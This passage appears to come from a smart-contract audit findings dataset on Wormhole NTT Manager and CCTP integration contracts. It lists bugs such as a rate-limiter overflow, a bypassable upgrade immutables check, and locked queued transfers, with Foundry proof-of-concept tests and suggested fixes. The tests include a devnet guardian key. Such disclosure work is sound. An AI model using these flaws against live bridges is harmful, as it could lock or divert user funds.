Transceiver index does not exist.чMissing Transceiver instructions prevents the total delivery price for the corresponding message from being calculated. This prevents any queued Transfers from being executed with the current list of transceivers. As a result, underlying sender funds will be stuck in the `NttManager` contract. Note that a similar issue occurs if the peer NTT manager contract is updated on the destination (say, after a redeployment on the source chain) before an in-flight attestation is received and executed, reverting with an invalid peer error.\\nProof of Concept: Run the following test:\\n```\\ncontract TestTransceiverModification is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n WormholeTransceiver wormholeTransceiver3Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = \"https://goerli.blockpi.network/v1/rpc/public\";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), 
DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), \"\")));\\n nttManagerChain1.initialize();\\n\\n // transceiver 1\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), \"\"))\\n );\\n\\n // transceiver 2\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), \"\"))\\n );\\n\\n // transceiver 3\\n WormholeTransceiver wormholeTransceiverChain1Implementation3 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver3Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation3), \"\"))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n wormholeTransceiver3Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // third transceiver is NOT set at this point for 
nttManagerChain1\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), \"\")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), \"\"))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. 
Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver3Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n\\n require(nttManagerChain1.getThreshold() != 0, \"Threshold is zero with active transceivers\");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testTransceiverModification() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructions(true)\\n );\\n vm.stopPrank();\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, 
chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n\\n // elapse some random time - 60 seconds\\n uint256 durationElapsedTime = initialBlockTimestamp + 60;\\n\\n // now add a third transceiver\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver3Chain1));\\n\\n // verify that the third transceiver is added\\n assertEq(nttManagerChain1.getTransceivers().length, 3);\\n\\n // remove second transceiver\\n nttManagerChain1.removeTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // verify that the second transceiver is removed\\n assertEq(nttManagerChain1.getTransceivers().length, 2);\\n\\n // elapse rate limit duration\\n durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(stdError.indexOOBError); //index out of bounds - transceiver instructions array does not have a third element to access\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructions(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: 
encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction1;\\n TransceiverInstructions[1] = TransceiverInstruction2;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\nч```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n -Silent overflow in `TrimmedAmount::shift` could result in rate limiter being bypassedчmediumчWithin `TrimmedAmount::trim`, there is an explicit check that ensures the scaled amount does not exceed the maximum uint64:\\n```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n\\nHowever, no such check exists within `TrimmedAmount::shift` which means there is potential for silent overflow when casting to `uint64` here:\\n```\\nfunction shift(\\n TrimmedAmount memory amount,\\n uint8 toDecimals\\n) internal pure returns (TrimmedAmount memory) {\\n uint8 actualToDecimals = minUint8(TRIMMED_DECIMALS, toDecimals);\\n return TrimmedAmount(\\n 
uint64(scale(amount.amount, amount.decimals, actualToDecimals)), actualToDecimals\n );\n}\n```\nчExplicitly check that the scaled amount in `TrimmedAmount::shift` does not exceed the maximum `uint64`.чA silent overflow in `TrimmedAmount::shift` could result in the rate limiter being bypassed, considering its usage in `NttManager::_transferEntryPoint`. Given the high impact and reasonable likelihood of this issue occurring, it is classified as a MEDIUM severity finding.ч```\n// NOTE: amt after trimming must fit into uint64 (that's the point of\n// trimming, as Solana only supports uint64 for token amts)\nif (amountScaled > type(uint64).max) {\n revert AmountTooLarge(amt);\n}\n```\n -Disabled Transceivers cannot be re-enabled by calling `TransceiverRegistry::_setTransceiver` after 64 have been registeredчmediumч`TransceiverRegistry::_setTransceiver` handles the registering of Transceivers, but note that they cannot be re-registered as this has other downstream effects, so this function is also responsible for the re-enabling of previously registered but currently disabled Transceivers.\n```\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\n /* snip */\n if (transceiver == address(0)) {\n revert InvalidTransceiverZeroAddress();\n }\n\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\n revert TooManyTransceivers();\n }\n\n if (transceiverInfos[transceiver].registered) {\n transceiverInfos[transceiver].enabled = true;\n } else {\n /* snip */\n}\n```\n\nThis function reverts if the passed transceiver address is `address(0)` or the number of registered transceivers is already at its defined maximum of 64. 
Assuming a total of 64 registered Transceivers, with some of these Transceivers having been previously disabled, the placement of this latter validation will prevent a disabled Transceiver from being re-enabled since the subsequent block in which the storage indicating its enabled state is set to `true` is not reachable. Consequently, it will not be possible to re-enable any disabled transceivers after having registered the maximum number of Transceivers, meaning that this function will never be callable without redeployment.чMove the placement of the maximum Transceivers validation to within the `else` block that is responsible for handling the registration of new Transceivers.чUnder normal circumstances, this maximum number of registered Transceivers should never be reached, especially since the underlying Transceivers are upgradeable. However, while unlikely based on operational assumptions, this undefined behavior could have a high impact, and so this is classified as a MEDIUM severity finding.ч```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n -NTT Manager cannot be unpaused once pausedчmediumч`NttManagerState::pause` exposes pause functionality to be triggered by permissioned actors but has no corresponding unpause functionality. 
As such, once the NTT Manager is paused, it will not be possible to unpause without a contract upgrade.\\n```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\nч```\\n// Add the line below\\n function unpause() public onlyOwnerOrPauser {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\nчThe inability to unpause the NTT Manager could result in significant disruption, requiring either a contract upgrade or complete redeployment to resolve this issue.ч```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n -Transceiver invariants and ownership synchronicity can be broken by unsafe Transceiver upgradesчmediumчTransceivers are upgradeable contracts integral to the cross-chain message handling of NTT tokens. While `WormholeTransceiver` is a specific implementation of the `Transceiver` contract, NTT Managers can integrate with Transceivers of any custom implementation.\\n`Transceiver::_checkImmutables` is an internal virtual function that verifies that invariants are not violated during an upgrade. Two checks in this function are that a) the NTT Manager address remains the same and b) the underlying NTT token address remains the same.\\nHowever, the current logic allows integrators to bypass these checks by either:\\nOverriding the `_checkImmutables()` function without the above checks.\\nCalling `Implementation::_setMigratesImmutables` with a `true` input. This effectively bypasses the `_checkImmutables()` function validation during an upgrade.\\nBased on the understanding that Transceivers are deployed by integrators external to NTT Manager owners, regardless of the high trust assumptions associated with integrators, it is risky for NTT Managers to delegate power to Transceivers to silently upgrade a transceiver contract that can potentially violate the NTT Manager invariants.\\nOne example of this involves the intended ownership model. 
Within `Transceiver::_initialize`, the owner of the Transceiver is set to the owner of the `NttManager` contract:\\n```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n\\nHowever, the transferring of this ownership via `Transceiver::transferTransceiverOwnership` is only allowed by the NTT Manager itself:\\n```\\n/// @dev transfer the ownership of the transceiver to a new address\\n/// the nttManager should be able to update transceiver ownership.\\nfunction transferTransceiverOwnership(address newOwner) external onlyNttManager {\\n _transferOwnership(newOwner);\\n}\\n```\\n\\nWhen the owner of the NTT Manager is changed by calling `NttManagerState::transferOwnership`, the owner of all the Transceivers is changed with it:\\n```\\n/// @notice Transfer ownership of the Manager contract and all Endpoint contracts to a new owner.\\nfunction transferOwnership(address newOwner) public override onlyOwner {\\n super.transferOwnership(newOwner);\\n // loop through all the registered transceivers and set the new owner of each transceiver to the newOwner\\n address[] storage _registeredTransceivers = _getRegisteredTransceiversStorage();\\n _checkRegisteredTransceiversInvariants();\\n\\n for (uint256 i = 0; i < _registeredTransceivers.length; i++) {\\n ITransceiver(_registeredTransceivers[i]).transferTransceiverOwnership(newOwner);\\n }\\n}\\n```\\n\\nThis design is intended to ensure that the NTT Manager's owner is kept in sync across all transceivers, access-controlled to prevent unauthorized ownership changes, but transceiver ownership can still be transferred directly as the public `OwnableUpgradeable::transferOwnership` function has not been overridden. 
Even if Transceiver ownership changes, the Manager is permitted to change it again via the above function.\nHowever, this behavior can be broken if the new owner of a Transceiver performs a contract upgrade without the immutables check. In this way, they can change the NTT Manager, preventing the correct manager from having permissions as expected. As a result, `NttManagerState::transferOwnership` will revert if any one Transceiver is out of sync with the others, and since it is not possible to remove an already registered transceiver, this function will cease to be useful. Instead, each Transceiver will be forced to be manually updated to the new owner unless the modified Transceiver is reset back to the previous owner so that this function can be called again.чConsider making `Transceiver::_checkImmutables` and `Implementation::_setMigratesImmutables` private functions for Transceivers. If the `_checkImmutables()` function has to be overridden, consider exposing another function that is called inside `_checkImmutables` as follows:\n```\nfunction _checkImmutables() private view override {\n assert(this.nttManager() == nttManager);\n assert(this.nttManagerToken() == nttManagerToken);\n _checkAdditionalImmutables();\n}\n\nfunction _checkAdditionalImmutables() private view virtual override {}\n```\nчWhile this issue may require the owner of a Transceiver to misbehave, a scenario where a Transceiver is silently upgraded with a new NTT Manager or NTT Manager token can be problematic for cross-chain transfers and so is pertinent to note.\nProof of Concept: The below PoC calls the `_setMigratesImmutables()` function with the `true` boolean, effectively bypassing the `_checkImmutables()` invariant check. As a result, a subsequent call to `NttManagerState::transferOwnership` is demonstrated to revert. 
This test should be added to the contract in `Upgrades.t.sol` before running, and the revert in `MockWormholeTransceiverContract::transferOwnership` should be removed to reflect the `true` functionality.\\n```\\nfunction test_immutableUpgradePoC() public {\\n // create the new mock ntt manager contract\\n NttManager newImpl = new MockNttManagerContract(\\n nttManagerChain1.token(), IManagerBase.Mode.BURNING, chainId1, 1 days, false\\n );\\n MockNttManagerContract newNttManager =\\n MockNttManagerContract(address(new ERC1967Proxy(address(newImpl), \"\")));\\n newNttManager.initialize();\\n\\n // transfer transceiver ownership\\n wormholeTransceiverChain1.transferOwnership(makeAddr(\"new transceiver owner\"));\\n\\n // create the new transceiver implementation, specifying the new ntt manager\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverImmutableAllow(\\n address(newNttManager),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n // perform the transceiver upgrade\\n wormholeTransceiverChain1.upgrade(address(wormholeTransceiverChain1Implementation));\\n\\n // ntt manager ownership transfer should fail and revert\\n vm.expectRevert(abi.encodeWithSelector(ITransceiver.CallerNotNttManager.selector, address(this)));\\n nttManagerChain1.transferOwnership(makeAddr(\"new ntt manager owner\"));\\n}\\n```\\nч```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n -Asymmetry in Transceiver pausing capabilityчlowчPausing functionality is exposed via Transceiver::_pauseTransceiver; however, there is no corresponding function that exposes unpausing 
functionality:\\n```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\nч```\\n// Add the line below\\n /// @dev unpause the transceiver.\\n// Add the line below\\n function _unpauseTransceiver() internal {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\nчWhile not an immediate issue since the above function is not currently in use anywhere, this should be resolved to avoid cases where Transceivers could become permanently paused.ч```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n -Incorrect Transceiver payload prefix definitionчlowчThe `WH_TRANSCEIVER_PAYLOAD_PREFIX` constant in `WormholeTransceiverState.sol` contains invalid ASCII bytes and, as such, does not match what is written in the inline developer documentation:\\n```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. 
It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n\\nThe correct payload prefix is `0x99455748`, which is output when running the following command:\\n```\\ncast --from-utf8 \"EWH\"\\n```\\nчUpdate the constant definition to use the correct prefix corresponding to the documented string:\\n```\\n// Add the line below\\n bytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x99455748;\\n```\\nчWhile still a valid 4-byte hex prefix, used purely for identification purposes, an incorrect prefix could cause downstream confusion and result in otherwise valid Transceiver payloads being incorrectly prefixed.ч```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n -Redemptions are blocked when L2 sequencers are downчmediumчGiven that rollups such as Optimism and Arbitrum offer methods for forced transaction inclusion, it is important that the aliased sender address is also checked within `Logic::redeemTokensWithPayload` when verifying the sender is the specified `mintRecipient` to allow for maximum uptime in the event of sequencer downtime.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, \"caller must be mintRecipient\"\\n);\\n```\\nчValidation of the sender address against the `mintRecipient` should also consider the aliased `mintRecipient` address to allow for maximum uptime when `Logic::redeemTokensWithPayload` is called via forced inclusion.чFailure to consider the aliased 
`mintRecipient` address prevents the execution of valid VAAs on a target CCTP domain where transactions are batched by a centralized L2 sequencer. Since this VAA could carry a time-sensitive payload, such as the urgent cross-chain liquidity infusion to a protocol, this issue has the potential to have a high impact with reasonable likelihood.\\nProof of Concept:\\nProtocol X attempts to transfer 10,000 USDC from CCTP Domain A to CCTP Domain B.\\nCCTP Domain B is an L2 rollup that batches transactions for publishing onto the L1 chain via a centralized sequencer.\\nThe L2 sequencer goes down; however, transactions can still be executed via forced inclusion on the L1 chain.\\nProtocol X implements the relevant functionality and attempts to redeem 10,000 USDC via forced inclusion.\\nThe Wormhole CCTP integration does not consider the contract's aliased address when validating the `mintRecipient`, so the redemption fails.\\nCross-chain transfer of this liquidity will remain blocked so long as the sequencer is down.ч```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, \"caller must be mintRecipient\"\\n);\\n```\\n -Potentially dangerous out-of-bounds memory access in `BytesParsing::sliceUnchecked`чlowч`BytesParsing::sliceUnchecked` currently bails early for the degenerate case when the slice `length` is zero; however, there is no validation on the `length` of the `encoded` bytes parameter `encoded` itself. 
If the `length` of `encoded` is less than the slice `length`, then it is possible to access memory out-of-bounds.\\n```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly (\"memory-safe\") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n\\nSince the `for` loop begins at the offset of `encoded` in memory, accounting `for` its `length` and accompanying `shift` calculation depending on the `length` supplied, and execution continues so long as `dest` is less than `end`, it is possible to continue loading additional words out of bounds simply by passing larger `length` values. 
Therefore, regardless of the `length` of the original bytes, the output slice will always have a size defined by the `length` parameter.\\nIt is understood that this is known behavior due to the unchecked nature of this function and the accompanying checked version, which performs validation on the `nextOffset` return value compared with the length of the encoded bytes.\\n```\\nfunction slice(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n (ret, nextOffset) = sliceUnchecked(encoded, offset, length);\\n checkBound(nextOffset, encoded.length);\\n}\\n```\\n\\nIt has not been possible within the constraints of this review to identify a valid scenario in which malicious calldata can make use of this behavior to launch a successful exploit; however, this is not a guarantee that the usage of this library function is bug-free since there do exist certain quirks related to the loading of calldata.чConsider bailing early if the length of the bytes from which to construct a slice is zero, and always ensure the resultant offset is correctly validated against the length when using the unchecked version of the function.чThe impact is limited in the context of the library function's usage in the scope of this review; however, it is advisable to check any other usage elsewhere and in the future to ensure that this behavior cannot be weaponized. `BytesParsing::sliceUnchecked` is currently only used in `WormholeCctpMessages::_decodeBytes`, which itself is called in `WormholeCctpMessages::decodeDeposit`. 
This latter function is utilized in two places:ч```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly (\"memory-safe\") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n -A given CCTP domain can be registered for multiple foreign chains due to insufficient validation in `Governance::registerEmitterAndDomain`чlowч`Governance::registerEmitterAndDomain` is a Governance action that is used to register the emitter address and corresponding CCTP domain for a given foreign chain. Validation is currently performed to ensure that the registered CCTP domain of the foreign chain is not equal to that of the local chain; however, there is no such check to ensure that the given CCTP domain has not already been registered for a different foreign chain. In this case, where the CCTP domain of an existing foreign chain is mistakenly used in the registration of a new foreign chain, the `getDomainToChain` mapping of an existing CCTP domain will be overwritten to the most recently registered foreign chain. 
Given the validation that prevents foreign chains from being registered again, without a method for updating an already registered emitter, it will not be possible to correct this corruption of state.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, \"chain already registered\");\\n\\n /* snip: additional parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\nчConsider adding the following validation when registering a CCTP domain for a foreign chain:\\n```\\n// Add the line below\\n require (getDomainToChain()[cctpDomain] == 0, \"CCTP domain already registered for a different foreign chain\");\\n```\\nчThe impact of this issue in the current scope is limited since the corrupted state is only ever queried in a public view function; however, if it is important for third-party integrators, then this has the potential to cause downstream issues.\\nProof of Concept:\\nCCTP Domain A is registered for foreign chain identifier X.\\nCCTP Domain A is again registered, this time for foreign chain identifier Y.\\nThe `getDomainToChain` mapping for CCTP Domain A now points to foreign chain identifier Y, while the `getChainToDomain` mapping for both X and Y now points to CCTP domain A.ч```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // For now, ensure that we cannot register the same foreign chain again.\\n require(registeredEmitters[foreignChain] == 0, \"chain already registered\");\\n\\n /* snip: additional parsing of Governance 
VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n -Lack of Governance action to update registered emittersчlowчThe Wormhole CCTP integration contract currently exposes a function `Governance::registerEmitterAndDomain` to register an emitter address and its corresponding CCTP domain on the given foreign chain; however, no such function currently exists to update this state. Any mistake made when registering the emitter and CCTP domain is irreversible unless an upgrade is performed on the entirety of the integration contract itself. Deployment of protocol upgrades comes with its own risks and should not be performed as a necessary fix for trivial human errors. Having a separate governance action to update the emitter address, foreign chain identifier, and CCTP domain is a preferable pre-emptive measure against any potential human errors.\\n```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\nчThe addition of a `Governance::updateEmitterAndDomain` function is recommended to allow Governance to more easily respond to any issues with the registered emitter state.чIn the event an emitter is registered with an incorrect foreign chain identifier or CCTP domain, then a protocol upgrade will be required to mitigate this issue. 
